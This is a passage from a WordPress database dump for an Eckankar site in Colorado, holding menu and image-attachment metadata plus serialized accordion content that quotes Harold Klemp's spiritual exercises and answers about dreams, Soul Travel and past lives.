;s:0:\"\";}'),(2175,45183,'_menu_item_xfn',''),(2176,45183,'_menu_item_url','#'),(2185,45207,'_menu_item_xfn',''),(2186,45207,'_menu_item_url',''),(2194,7174,'bgseo_robots_follow','follow'),(2195,45699,'_menu_item_type','custom'),(2196,45699,'_menu_item_menu_item_parent','7163'),(2197,45699,'_menu_item_object_id','45699'),(2198,45699,'_menu_item_object','custom'),(2199,45699,'_menu_item_target',''),(2200,45699,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2201,45699,'_menu_item_xfn',''),(2202,45699,'_menu_item_url','http://www.youtube.com/user/EckankarOfficialSite'),(2204,45700,'_menu_item_type','custom'),(2205,45700,'_menu_item_menu_item_parent','7163'),(2206,45700,'_menu_item_object_id','45700'),(2207,45700,'_menu_item_object','custom'),(2208,45700,'_menu_item_target',''),(2209,45700,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2210,45700,'_menu_item_xfn',''),(2211,45700,'_menu_item_url','http://www.eckankar.org/'),(2213,45701,'_menu_item_type','custom'),(2214,45701,'_menu_item_menu_item_parent','7163'),(2215,45701,'_menu_item_object_id','45701'),(2216,45701,'_menu_item_object','custom'),(2217,45701,'_menu_item_target',''),(2218,45701,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2219,45701,'_menu_item_xfn',''),(2220,45701,'_menu_item_url','http://www.eckankar.org/Membership/index.html'),(2222,45842,'_edit_lock','1686942098:2'),(2223,45842,'_edit_last','2'),(2232,45842,'_wp_page_template','default'),(2233,45842,'_wpac_members_redirect_to',''),(2234,45842,'_wpac_show_in_search','0'),(2235,45842,'_wpac_show_excerpt_in_search','0'),(2236,45842,'_wpac_nonmembers_redirect_to',''),(2237,45842,'boldgrid_hide_page_title','0'),(2238,45842,'boldgrid_in_page_containers','1'),(2239,45842,'bgseo_robots_index','index'),(2240,45842,'bgseo_robots_follow','follow'),(2263,46112,'_menu_item_object_id','45842'),(2262,46112,'_menu_item_menu_item_parent','7163'),(2261,46112,'_menu_item_type','post_type'),(2260,46112,'boldgrid_in_page_containers','1'),(2259,46112,'boldgrid_hide_page_title','0'),(2258,46112,'_wpac_nonmembers_redirect_to',''),(2257,46112,'_wpac_show_excerpt_in_search','0'),(2256,46112,'_wpac_show_in_search','0'),(2255,46112,'_wpac_members_redirect_to',''),(2264,46112,'_menu_item_object','page'),(2265,46112,'_menu_item_target',''),(2266,46112,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2267,46112,'_menu_item_xfn',''),(2268,46112,'_menu_item_url',''),(2532,51767,'_edit_last','1'),(2281,45842,'_oembed_1f72b9b20df6dad278506c9cdf9fe828','<iframe title=\"City at Night\" width=\"780\" height=\"439\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(2277,46829,'_wp_attached_file','2019/07/eck-activities-sos-2.jpg'),(2278,46829,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:246;s:6:\"height\";i:153;s:4:\"file\";s:32:\"2019/07/eck-activities-sos-2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"eck-activities-sos-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"eck-activities-sos-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"eck-activities-sos-2-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2282,45842,'_oembed_time_1f72b9b20df6dad278506c9cdf9fe828','1563812426'),(59553,245088,'_wp_attached_file','2020/01/activities-splash-sized.jpg'),(2442,49522,'_edit_lock','1563818509:1'),(2443,49522,'_edit_last','1'),(2444,49522,'boldgrid_hide_page_title','0'),(2445,49522,'sp_eap_upload_options','a:2:{s:18:\"eap_accordion_type\";s:17:\"content-accordion\";s:24:\"accordion_content_source\";a:6:{i:0;a:2:{s:23:\"accordion_content_title\";s:24:\"Soul Travel The Easy Way\";s:29:\"accordion_content_description\";s:1539:\"<p><img class=\" size-full wp-image-387 alignleft\" style=\"margin: 5px 20px 20px 0;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/03/gate_path.jpg\" alt=\"Soul Travel The Easy Way!\" width=\"178\" height=\"241\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Soul Travel The Easy Way - A Spiritual Exercise</span></strong></p>\r\n<p>Just before going to bed at night concentrate your attention on the Spiritual Eye, that place between the eyebrows. Chant HU or God inwardly and silently.</p>\r\n<p>Hold your attention on a black screen in the inner vision, and keep it free of any pictures if at all possible. If you need a substitute for mental pictures flashing up unwantedly, put the image of the Living ECK Master in place of them.</p>\r\n<p>After a few minutes of this , you may hear a faint clicking sound in one ear or the sound of a cork popping. You will suddenly find yourself outside the physical body, looking back at it in the room. Now you are ready for a short journey in the other worlds.</p>\r\n<p>There is nothing to fear, for no harm can come to you while outside the body. Although you may not know it, the Mahanta will be standing by to keep watch over your progress. After a while the Soul body will return and slide gently into the physical self with hardly more than a very light jolt.</p>\r\n<p>If this is not successful the first time, try it again, for the technique works. It has worked for others.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK, p. 235</em></span></p>\";}i:1;a:2:{s:23:\"accordion_content_title\";s:25:\"Getting Answers in Dreams\";s:29:\"accordion_content_description\";s:1334:\"<p><img class=\" size-full wp-image-387 alignleft\" style=\"margin: 5px 20px 20px 0;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/03/ans_dreams.jpg\" alt=\"Getting Answers in Dreams\" width=\"178\" height=\"241\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Getting Answers in Dreams – A Spiritual Exercise</span></strong></p>\r\n<p>At some level Soul knows everything. If there is something that you would like to bring into consciousness, here is a way to get help.</p>\r\n<p>Before you go to sleep, relax and decide that upon wakening you will have an answer to whatever it is that you desire.</p>\r\n<p>When you awaken it will be in the forefront of your thoughts. At the moment of slipping from or into sleep, you are opened to truth and in direct contact with it. It is at this point that you will perceive your answer.</p>\r\n<p>Immediately make note of it in your dream journal.</p>\r\n<p>We know that there is an answer for every situation that comes up in our life. There is always a way, somehow. What holds us back is our attitudes.</p>\r\n<p>Learn the value of doing a spiritual exercise just before retiring or upon awakening. It works to your advantage during these times of change in conscious awareness.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK, p. 35</em></span></p>\";}i:2;a:2:{s:23:\"accordion_content_title\";s:25:\"Contact The Light & Sound\";s:29:\"accordion_content_description\";s:1476:\"<p><img class=\" size-full wp-image-388 alignleft\" style=\"margin: 5px 20px 20px 0;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/03/contact_light_sound.jpg\" alt=\"Contact The Light & Sound \" width=\"179\" height=\"242\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">The Temple Door - A Spiritual Exercise</span></strong></p>\r\n<p>This is a very simple exercise to make contact with the Voice of God.</p>\r\n<p>Close your eyes and relax. You are preparing to enter the inner temple, that sacred place where Soul has communication with God. You may see the Light of God first in your Spiritual Eye. You may see it as a Blue Light or a Blue Star. You may see It as a globe or blob of light.</p>\r\n<p>This means you have contact with the highest state of consciousness that is available. It can uplift you to the very same state, too, but not overnight – the shock would be too great.</p>\r\n<p>After you see the light in your Spiritual Eye or feel It in your heart center, then comes the Sound. The Sound may come first at times.</p>\r\n<p>The Sound may be that of the flute of God which comes from the Soul Plane. Or you may hear the buzzing of bees or any number of different sounds. Later, as you move higher, it may become a very high peeping sound, a single peep so high that it feels as if you can barely reach it. It is the Voice of God uplifting you.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 137</p>\";}i:3;a:2:{s:23:\"accordion_content_title\";s:23:\"Create a Brighter World\";s:29:\"accordion_content_description\";s:1248:\"<img style=\"margin:5px 20px 20px 0;\" class=\" size-full wp-image-392 alignleft\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/03/spex_swirl_clouds.jpg\" alt=\"Create A Brighter World - Soul Travel\" width=\"186\" height=\"248\" />\r\n<p><span style=\"color: #23507d;\">Create a Brighter World - A Spiritual Exercise</span></p>\r\n \r\n<p>If you have an uncomfortable experience or dream - or one you don\'t understand - take it into contemplation. Begin by singing HU for a few minutes. Then rewind the dream or experience, and run it through your mind. Next, visualize a door that opens into golden sunlight. This is the Light of God.</p>\r\n \r\n<p>Now take the uncomfortable experience from the darkness; take it from the silence and solitude though the open doorway where it is dissolved by the Light and Sound of God.</p>\r\n \r\n<p>This exercise can get you in the habit of looking for a brighter, more creative world, where you can find more inner satisfaction. With the help of the Inner Master, the Mahanta, you are learning to take charge of your life. You are becoming the aware Soul, the creator of your own worlds.</p>\r\n \r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 231</p>\r\n </span></p>\";}i:4;a:2:{s:23:\"accordion_content_title\";s:20:\"Watching Your Dreams\";s:29:\"accordion_content_description\";s:1369:\"<p><img class=\" size-full wp-image-391 alignleft\" style=\"margin: 5px 20px 20px 0;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/03/spex_sunset_ocean.jpg\" alt=\"Watching Your Dreams - A Spiritual Exercise\" width=\"183\" height=\"246\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Watching Your Dreams - A Spiritual Exercise</span></strong></p>\r\n<p>The dream world and its people are real. It is only our recall and understanding of it that are incomplete. Our link with the inner worlds is usually through dreams, but illusion can make our memory of inner events faulty.</p>\r\n<p>What about the dream people who appear to be just symbolic parts of ourselves? Lets start with the waking dream. The Mahanta uses it to give someone a spiritual insight from an experience in his daily life. The Master draws on the individual\'s experience with real people and real events to point out some personal truth.</p>\r\n<p>Apply the principle of the waking dream to your dream world. The people you meet there are Souls, just like you. However, the Mahanta can turn your experience with them into an open window of understanding, to unlock your desires, needs, and goals.</p>\r\n<p>Keep a journal of your dreams and begin to note any parallels between them.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 211</p>\";}i:5;a:2:{s:23:\"accordion_content_title\";s:15:\"Stepping Stones\";s:29:\"accordion_content_description\";s:1312:\"<p><img class=\" size-full wp-image-390 alignleft\" style=\"margin: 5px 20px 20px 0;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/03/spex_autumn_path.jpg\" alt=\"Stepping-Stones - A Spiritual Exercise\" width=\"182\" height=\"248\" /></p>\r\n<p><strong><span style=\"color: #23507d;\">Stepping-Stones - A Spiritual Exercise</span></strong></p>\r\n<p>Some people never recognize the blessings they receive. Others may look back and realize they\'ve had a gift of healing of some sort. Maybe something has changed at work to make their life better. But it depends upon the individual – how conscious you are.</p>\r\n<p>A spiritual exercise to begin recognizing your gifts is this: Sing HU quietly to yourself or out loud.</p>\r\n<p>Look at the obstacles in your life that you think are stumbling blocks. Imagine them becoming stepping-stones. How are they teaching you about yourself? Open yourself and gain greater awareness of this as you sing HU.</p>\r\n<p>The teaching of ECK are all about God\'s love for you. HU is an ancient name for God that is the key to your secret worlds. Once you learn this key, you will find a blending of your inner and outer worlds. You\'ll find yourself filling with love.</p>\r\n<p><span style=\"color: #23507d;\">Harold Klemp - <em>The Spiritual Exercises of ECK,</em></span> p. 171</p>\";}}}'),(2446,49522,'sp_eap_shortcode_options','a:27:{s:20:\"eap_accordion_layout\";s:8:\"vertical\";s:19:\"eap_accordion_theme\";s:9:\"sp-ea-one\";s:19:\"eap_accordion_event\";s:8:\"ea-click\";s:18:\"eap_accordion_mode\";s:12:\"ea-all-close\";s:21:\"eap_mutliple_collapse\";s:0:\"\";s:23:\"eap_accordion_fillspace\";s:0:\"\";s:30:\"eap_accordion_fillspace_height\";a:1:{s:3:\"all\";s:3:\"200\";}s:13:\"eap_preloader\";s:0:\"\";s:13:\"section_title\";s:0:\"\";s:27:\"section_title_margin_bottom\";a:1:{s:3:\"all\";s:2:\"30\";}s:21:\"eap_expand_close_icon\";s:1:\"1\";s:24:\"eap_expand_collapse_icon\";s:1:\"1\";s:13:\"eap_icon_size\";a:1:{s:3:\"all\";s:2:\"16\";}s:18:\"eap_icon_color_set\";s:4:\"#444\";s:17:\"eap_icon_position\";s:4:\"left\";s:14:\"eap_border_css\";a:3:{s:3:\"all\";s:1:\"1\";s:5:\"style\";s:5:\"solid\";s:5:\"color\";s:7:\"#e2e2e2\";}s:15:\"eap_title_color\";s:7:\"#23507d\";s:19:\"eap_header_bg_color\";s:4:\"#eee\";s:21:\"eap_description_color\";s:4:\"#444\";s:24:\"eap_description_bg_color\";s:4:\"#fff\";s:18:\"eap_animation_time\";s:3:\"500\";s:23:\"section_title_font_load\";s:0:\"\";s:28:\"eap_section_title_typography\";a:4:{s:6:\"subset\";s:0:\"\";s:5:\"color\";s:4:\"#444\";s:4:\"type\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:19:\"eap_title_font_load\";s:0:\"\";s:20:\"eap_title_typography\";a:4:{s:6:\"subset\";s:0:\"\";s:5:\"color\";s:4:\"#444\";s:4:\"type\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:18:\"eap_desc_font_load\";s:0:\"\";s:22:\"eap_content_typography\";a:4:{s:6:\"subset\";s:0:\"\";s:5:\"color\";s:4:\"#444\";s:4:\"type\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}}'),(2447,49868,'_edit_lock','1563822771:1'),(2448,49868,'_edit_last','1'),(2449,49868,'wpsm_accordion_data','s:9519:\"a:10:{i:0;a:4:{s:15:\"accordion_title\";s:28:\"How do I remember my dreams?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1244:\"<p>The physical mind is limited, like a little bucket. The inner experiences you have on all the spiritual planes are like a vast ocean. It is useless trying to pour the ocean into the mind\'s little bucket.</p>\r\n<p>Soul is running several bodies at the same time on other planes. Its scope of action is much greater than the recall ability of the dreamer\'s mind.</p>\r\n<p>Sometimes the mind wants to protect you because the dream would shock you. It\'s a different world with different rules. You wake up here, and right away this world crowds in on you. And you say, \'I\'ve got to get up, go to school or work\'.</p>\r\n<p>Some people naturally enjoy vivid recollections of their dream state, but those who don\'t can develop the skill.</p>\r\n<p>You can set a dream in your mind as you wake up by repeating the points of it, then talking about it out loud or writing it down as soon as you get up.</p>\r\n<p>It is also possible to develop a sharper recall of the dream state by keeping a notebook by the bed, with pen and light at hand. Make a resolution to wake - even in the middle of the night - to record any memory of the dream state, no matter how trivial it seems.\"</p>\r\n<p><em>Youth Ask a Modern Prophet about Life, Love, and God, p. 87</em></p>\";}i:1;a:4:{s:15:\"accordion_title\";s:60:\"Does each dream have a spiritual meaning or lesson involved?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1509:\"<p>\"Every experience, waking or dream, has a lesson or message to impart to us. But let the meanings of your inner and outer experiences come naturally. In other words, if the lesson or message isn\'t clear, don\'t force it.</p>\r\n<p>Soul, the spiritual self that you are, will send another dream again in some other way until your human self can easily grasp the meaning.</p>\r\n<p>In Eckankar, dream study works on all levels. As with all things of a divine nature, accept each dream as a spiritual gift. Wonder about it. Roll it gently around in your mind to see whether loving patience on your part will reveal its significance.</p>\r\n<p>This approach is the reason the Eckankar spiritual studies are called the Easy Way.</p>\r\n<p>One other point. Dream experiences are real experiences from another time, place, or dimension. Some of them are from past lives, which you\'d expect to be straightforward. Yet here\'s where the mind - or what you called \'just purely creations of my imagination?\' - comes in.</p>\r\n<p>The dream censor is a function, or part, of the mind. For purely karmic reasons it may decide that a certain past life would be too much of a shock to you. You might break off a relationship. Yet that relationship in the present time may be necessary to bring an important insight to you.</p>\r\n<p>So the dream censor tones down dreams. It lets a dreamer go ahead with life and so profit from past-life experiences.\"</p>\r\n<p><em>Youth Ask a Modern Prophet about Life, Love, and God, p. 88-89</em></p>\";}i:2;a:4:{s:15:\"accordion_title\";s:26:\"What is a spiritual dream?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:315:\"<p>\"A spiritual dream is any dream. There is a spiritual side to every experience or event, no matter how large or small, and whether or not it occurs in every-day life or in a dream.</p>\r\n<p>But---and this is a big but---few people have the spiritual eyes to see.\"</p>\r\n<p><em>Ask the Master, Book 1, p. 5</em></p>\";}i:3;a:4:{s:15:\"accordion_title\";s:40:\"What can dreams tell us about ourselves?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:630:\"<p>\"Dreams hint at truth. I say hint instead of tell for a reason: Most people don’t actually want to know the truth. The truth hurts. Dreams can tell us when we’re unkind, unfair, vengeful, selfish, and other unpleasant facts that we need to work on spiritually. But truth makes most people uncomfortable, so they shut it out and forget their dreams.</p>\r\n<p>I’ve tried many dream systems and have kept a record of my own inner travels for years. Of all the systems, the dream methods of ECK are the golden thread that has been of the most use to me for spiritual growth.\"</p>\r\n<p><em>Ask the Master, Book 1, p. 14</em></p>\";}i:4;a:4:{s:15:\"accordion_title\";s:16:\"Are dreams real?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1107:\"<p>\"A dream is a real experience. Soul Travel is a more-than-real spiritual experience. As Soul, you can (and do) have hundreds of experiences going on side by side at different levels. So does everyone else.</p>\r\n<p>Here is a way to understand the variety of inner experiences: it\'s as if Soul experiences what hundreds of people in a town do on a certain day. The mind, meanwhile, can recall only a few experiences at a time.</p>\r\n<p>You may remember a certain inner experience with someone on the inner planes because of its spiritual importance for you. However, the other person will likely remember completely different experiences because your needs are different.</p>\r\n<p>In comparison to Soul, our mind holds only a few memories at a time. We remember those that mean the most to us spiritually. Only rarely do the spiritual needs of two people exactly coincide. When they do, both dreamers will remember the same dream. However, their different levels of consciousness will give each a special view of what actually happened in the dream state.\"</p>\r\n<p><em>Ask the Master, Book 1, p. 1-2</em></p>\";}i:5;a:4:{s:15:\"accordion_title\";s:44:\"What advice do you have for better dreaming?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:891:\"<p>“There are three main steps I recommend. First, arrange your schedule to get as much sleep as needed to be fresh in the morning.</p>\r\n<p>Second, for a few minutes before sleeping, read from any of the ECK books to signal Soul of your intent to pursue spiritual activity during sleep: for example The Eternal Dreamer, The Dream Master, The Shariyat-Ki-Sugmad,The Spiritual Notebook, or Stranger by the River.</p>\r\n<p>Third, contemplate upon the face of the Mahanta, the Living ECK Master at bedtime. Do this in either a seated or prone position. In the spiritual exercise, give an invitiation to the Master like this: ‘I welcome you into my heart as into my home. Please enter it with joy.\'</p>\r\n<p>Then go to sleep as usual, but leave the eye of Soul alert to the coming of the teacher. Look for me, because I am always with you.\"</p>\r\n<p><em>Ask the Master, Book I, p. 25-26</em></p>\";}i:6;a:4:{s:15:\"accordion_title\";s:35:\"What is the purpose of Soul Travel?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:447:\"<p>“All that Soul Travel is, is one means available for you to find the love of God.</p>\r\n<p>The path of ECK is much broader than Soul Travel, of course. There are many ways that the ECK expresses itself to the human race, but many of the ways seem so commonplace that the average person doesn’t see or hear them anymore....</p>\r\n<p>You do not have to Soul Travel to be successful in ECK.”</p>\r\n<p><em>Ask the Master, Book 1, p. 166</em></p>\";}i:7;a:4:{s:15:\"accordion_title\";s:20:\"What is Soul Travel?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:513:\"<p>\"Soul Travel is one of the foundations of ECKANKAR. It ranges from the unmistakable state of becoming aware of yourself in the Soul body, while traveling on one of the neighboring planes, to more subtle ones, such as having an insight into a concern that previously seemed beyond your abilities to solve.</p>\r\n<p>The dynamic of Soul Travel is unforgettable for anyone who is able to have it. It occurs through the practice of the Spiritual Exercises of ECK.\"</p>\r\n<p><em>Ask the Master, Book 1, p. 163</em></p>\";}i:8;a:4:{s:15:\"accordion_title\";s:58:\"I would like to see my past lives. How do I go about this?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:559:\"<p>\"When we practice the Spiritual Exercises of ECK faithfully, the Inner Master will open us up to those things that are important to see concerning past lives. Most of them need not concern us. No matter what we were in the past during any other life, we are spiritually greater today.…</p>\r\n<p>We live the spiritual life beginning where we are today. We look to see the hand of Divine Spirit guiding us toward the greater consciousness, which leads us to becoming a more direct vehicle for Spirit.”</p>\r\n<p><em>Ask the Master, Book 1, p. 59-60</em></p>\";}i:9;a:4:{s:15:\"accordion_title\";s:40:\"Do you have any tips on past life study?\";s:20:\"accordion_title_icon\";s:7:\"fa-leaf\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:427:\"<p>\"I prefer that ECKists trace their past lives through their study of dreams. There are many reasons for this that time does not allow me to go into here.</p>\r\n<p>To awaken such past-life dreams, make a note of things you greatly like or dislike. Do that also with people. Then watch your dreams. Also note if a certain country or century attracts you. There is a reason.”</p>\r\n<p><em>Ask the Master, Book 1, p. 56</em></p>\";}}\";'),(2450,49868,'wpsm_accordion_count','10'),(2451,49868,'Accordion_Settings','s:570:\"a:18:{s:13:\"acc_sec_title\";s:2:\"no\";s:10:\"op_cl_icon\";s:3:\"yes\";s:14:\"acc_title_icon\";s:3:\"yes\";s:10:\"acc_radius\";s:3:\"yes\";s:10:\"acc_margin\";s:3:\"yes\";s:15:\"acc_op_cl_align\";s:5:\"right\";s:13:\"enable_toggle\";s:2:\"no\";s:16:\"enable_ac_border\";s:3:\"yes\";s:13:\"expand_option\";s:1:\"3\";s:9:\"ac_styles\";s:1:\"1\";s:16:\"acc_title_bg_clr\";s:7:\"#e8e8e8\";s:18:\"acc_title_icon_clr\";s:7:\"#23507d\";s:15:\"acc_desc_bg_clr\";s:7:\"#ffffff\";s:17:\"acc_desc_font_clr\";s:7:\"#333333\";s:10:\"title_size\";s:2:\"18\";s:8:\"des_size\";s:2:\"16\";s:11:\"font_family\";s:9:\"Open Sans\";s:10:\"custom_css\";s:0:\"\";}\";'),(2452,49868,'boldgrid_hide_page_title','0'),(27441,198742,'_wp_attached_file','2019/10/flower-water.jpg'),(27442,198742,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:283;s:6:\"height\";i:192;s:4:\"file\";s:24:\"2019/10/flower-water.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"flower-water-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"flower-water-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:24:\"flower-water-250x170.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:24:\"flower-water-265x180.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"flower-water-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27439,198741,'_wp_attached_file','2019/10/flower-stump.jpg'),(27440,198741,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:24:\"2019/10/flower-stump.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"flower-stump-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"flower-stump-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"flower-stump-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:24:\"flower-stump-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:24:\"flower-stump-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:24:\"flower-stump-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"flower-stump-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27433,198738,'_wp_attached_file','2019/10/blue-moon.jpg'),(27434,198738,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:342;s:6:\"height\";i:192;s:4:\"file\";s:21:\"2019/10/blue-moon.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"blue-moon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"blue-moon-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"blue-moon-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:21:\"blue-moon-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:21:\"blue-moon-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"blue-moon-321x180.jpg\";s:5:\"width\";i:321;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"blue-moon-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27435,198739,'_wp_attached_file','2019/10/boy-leaning-watching.jpg'),(27436,198739,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:342;s:6:\"height\"